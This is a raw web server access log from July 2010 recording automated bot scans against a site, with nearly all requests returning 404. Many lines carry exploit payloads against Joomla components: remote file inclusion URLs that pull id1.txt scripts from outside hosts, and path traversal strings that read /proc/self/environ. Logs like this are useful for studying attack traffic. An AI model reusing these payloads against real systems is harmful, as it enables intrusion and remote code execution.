79.110.132.245 - - [01/Jul/2010:05:00:13 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
79.110.132.245 - - [01/Jul/2010:05:00:13 -0500] "GET /logs/access_log.1266710400//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
193.231.187.33 - - [01/Jul/2010:05:00:29 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:05:00:29 -0500] "GET /logs/access_log.1276473600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:05:00:29 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
222.236.47.182 - - [01/Jul/2010:05:00:42 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
222.236.47.182 - - [01/Jul/2010:05:00:43 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.236.47.182 - - [01/Jul/2010:05:00:43 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.195.112.180 - - [01/Jul/2010:05:01:16 -0500] "GET /logs/access_log.1160697600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.110.132.245 - - [01/Jul/2010:05:01:25 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
79.110.132.245 - - [01/Jul/2010:05:01:25 -0500] "GET /logs/access_log.1266710400//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
79.110.132.245 - - [01/Jul/2010:05:01:28 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jul/2010:05:02:08 -0500] "GET /logs/access_log.1196640000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.110.132.245 - - [01/Jul/2010:05:02:33 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
79.110.132.245 - - [01/Jul/2010:05:02:33 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
79.110.132.245 - - [01/Jul/2010:05:02:33 -0500] "GET /logs/access_log.1266710400%20%20//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
89.200.170.145 - - [01/Jul/2010:05:03:05 -0500] "GET /logs/access_log.1275091200/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:05:03:05 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:05:03:06 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
38.113.115.196 - - [01/Jul/2010:05:04:28 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
222.236.47.182 - - [01/Jul/2010:05:04:47 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
222.236.47.182 - - [01/Jul/2010:05:04:47 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.236.47.182 - - [01/Jul/2010:05:04:48 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
79.110.132.245 - - [01/Jul/2010:05:05:28 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
79.110.132.245 - - [01/Jul/2010:05:05:28 -0500] "GET /logs/access_log.1266710400%20%20//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
79.110.132.245 - - [01/Jul/2010:05:05:28 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
38.113.115.196 - - [01/Jul/2010:05:05:31 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.78.118.123 - - [01/Jul/2010:05:08:59 -0500] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.73.239.6 - - [01/Jul/2010:05:09:05 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.807"
217.73.239.6 - - [01/Jul/2010:05:09:06 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.807"
217.73.239.6 - - [01/Jul/2010:05:09:06 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.807"
89.200.170.145 - - [01/Jul/2010:05:09:27 -0500] "GET /logs/access_log.1276214400/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:05:09:28 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:05:09:28 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
217.73.239.6 - - [01/Jul/2010:05:09:56 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.807"
201.20.37.144 - - [01/Jul/2010:05:10:19 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:05:10:19 -0500] "GET /logs/access_log.1268352000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:05:10:19 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:10:39 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
67.215.230.121 - - [01/Jul/2010:05:11:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:38 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.215.230.121 - - [01/Jul/2010:05:11:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
80.74.153.40 - - [01/Jul/2010:05:11:47 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:11:47 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:11:47 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.200.170.145 - - [01/Jul/2010:05:11:56 -0500] "GET /logs/access_log.1275091200/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.813"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:40 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [01/Jul/2010:05:12:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.195.112.180 - - [01/Jul/2010:05:13:17 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 3450 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.200.170.145 - - [01/Jul/2010:05:14:17 -0500] "GET /logs/access_log.1276214400/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:05:14:17 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:05:14:17 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
193.231.187.33 - - [01/Jul/2010:05:14:52 -0500] "GET /logs/access_log.1276473600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:05:14:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:05:14:53 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
77.250.23.195 - - [01/Jul/2010:05:17:25 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:25 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:31 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:31 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:31 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:17:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
125.141.91.138 - - [01/Jul/2010:05:18:00 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:18:52 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
80.74.153.40 - - [01/Jul/2010:05:18:52 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
80.74.153.40 - - [01/Jul/2010:05:19:15 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.74.153.40 - - [01/Jul/2010:05:19:15 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
38.113.115.196 - - [01/Jul/2010:05:20:08 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:21:08 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.120.225.202 - - [01/Jul/2010:05:21:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.120.225.202 - - [01/Jul/2010:05:21:29 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.120.225.202 - - [01/Jul/2010:05:21:29 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
89.110.147.156 - - [01/Jul/2010:05:21:43 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
89.110.147.156 - - [01/Jul/2010:05:21:44 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.110.147.156 - - [01/Jul/2010:05:21:44 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:58 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:58 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
